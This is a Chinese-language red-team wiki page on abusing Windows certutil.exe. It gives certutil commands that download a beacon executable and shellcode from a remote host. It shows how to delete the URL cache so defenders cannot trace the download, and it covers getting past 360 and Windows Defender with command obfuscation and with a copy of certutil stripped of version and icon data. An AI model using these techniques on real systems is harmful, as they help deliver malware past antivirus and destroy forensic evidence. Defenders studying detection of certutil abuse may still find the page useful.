search

Certutil绕过技巧

hashtag
简介

certutil.exe是Windows操作系统中的一个命令行程序,主要用于处理和管理证书。这个工具可以用于执行各种与证书有关的任务,包括:

  1. 查看证书详情:您可以使用certutil.exe来查看已安装证书的详细信息,包括其签发者,有效期,公钥和私钥等。

  2. 导入和导出证书certutil.exe可以用来导入或导出证书,这对于备份或迁移证书非常有用。

  3. 创建和删除证书:使用certutil.exe,您可以创建新的自签名证书,或者删除不再需要的证书。

  4. 管理证书库certutil.exe还允许您查看和管理您的证书库,这是存储所有证书的地方。

hashtag
certutil常用命令

输入certutil -?查看此命令的更多操作,如下图所示:

image-20230712215609377

以下是certutil在渗透测试中常用到的一些命令参数:

  • -dump: 显示证书的内容。例如:certutil -dump myfile.cer

  • -decode: 解码 Base64 编码的文件。此选项可以用于解密或提取通过 Base64 编码的数据。例如:certutil -decode inputfile outputfile

  • -encode: 将文件编码为 Base64。这可以用于将二进制数据编码为文本。例如:certutil -encode inputfile outputfile

  • -urlcache: 显示或删除 URL 缓存的条目。在渗透测试中,这可以用于获取关于被访问的网页的信息。例如:certutil -urlcache

  • -f: 强制覆盖现有文件或下载。在与 -urlcache 结合使用时,-f 选项可以用于下载文件。例如:certutil -urlcache -split -f http://example.com/myfile,其中-split选项将文件拆分为小的块(如果需要在下载大文件时,这可能有助于提高性能

certutil最常用到的命令还得是远程文件下载:certutil -urlcache -split -f http:// 192.168.0.103/beacon.exe

image-20230712220849062

但是下载文件后会产生缓存,可通过certutil -urlcache *进行查看

image-20230712221250955

避免蓝队查看缓存溯源,可以执行certutil -urlcache * delete来删除所有缓存

image-20230712222627288
image-20230712222910681

或者在下载命令后面加个delete来删除当前下载文件的缓存:certutil -urlcache -split -f http:// 192.168.0.103/beacon.exe delete

image-20230712222958364

使用 certutil 命令下载文件时,文件的存放位置取决于你在命令行中指定的路径。如果你没有指定路径,那么文件会被保存到你当前的工作目录,例如此处我是在C:\Users\hasee目录下执行的certutil命令

image-20230712223214002

如果你想要将下载的文件保存到特定位置,你可以在文件名中填写完整路径

image-20230712223710208

hashtag
绕过360实战

在360核晶模式环境下,运行certutil命令远程下载文件,不出所料,被拦截掉了

image-20230713201900899

以下命令利用Windows命令行解析器对特殊字符的处理规则进行混淆, 但还是会被核晶查杀

  • 分号(;)和逗号(,)会被cmd命令忽略,

  • @ 符号在CMD中用于关闭命令回显,意味着运行 @certutil 不会在命令行中显示任何输出

  • -urlcache参数插入双引号("")同样也会被解析器忽略

image-20230713204717895

看了先知社区师傅的一篇文章:https://xz.aliyun.com/t/12503,在命令后面加个-deletePolicyServer参数, 其作用是命令执行后会生成对应文件的缓存文件,但是这种方法失效了,依然会被360拦截

还有其他类似参数:-DeleteHelloContainer-deleteEnrollmentServer-deleteEccCurve

image-20230713213757568

尝试将certutil文件拷贝出来执行,依旧被拦截,个人推测360是通过校验hash方法来判断你执行的可执行程序是否是certutil

image-20230713213912937

将certutil.exe拖入Resource Hacker中,删除其版本和图标信息

image-20230713213426191

修改后的certutil并不需要做命令混淆,直接执行即可:cert.exe -urlcache -split -f http://192.168.0.103:8000/shellcode_hex.txt,没有被拦截,但是这种情况在实战中并没有太大的用处

image-20230713214110405

hashtag
绕Defender

WindowsDefender绕过比较简单,使用^符号做下命令混淆就能bypass, 如下两个都是bypass成功的示例代码

image-20230713215011940

hashtag
参考链接

  • https://xz.aliyun.com/t/12503

  • https://www.freebuf.com/articles/endpoint/334548.html

上一页BypassPPL下一页DLL劫持技术(白+黑)

最后更新于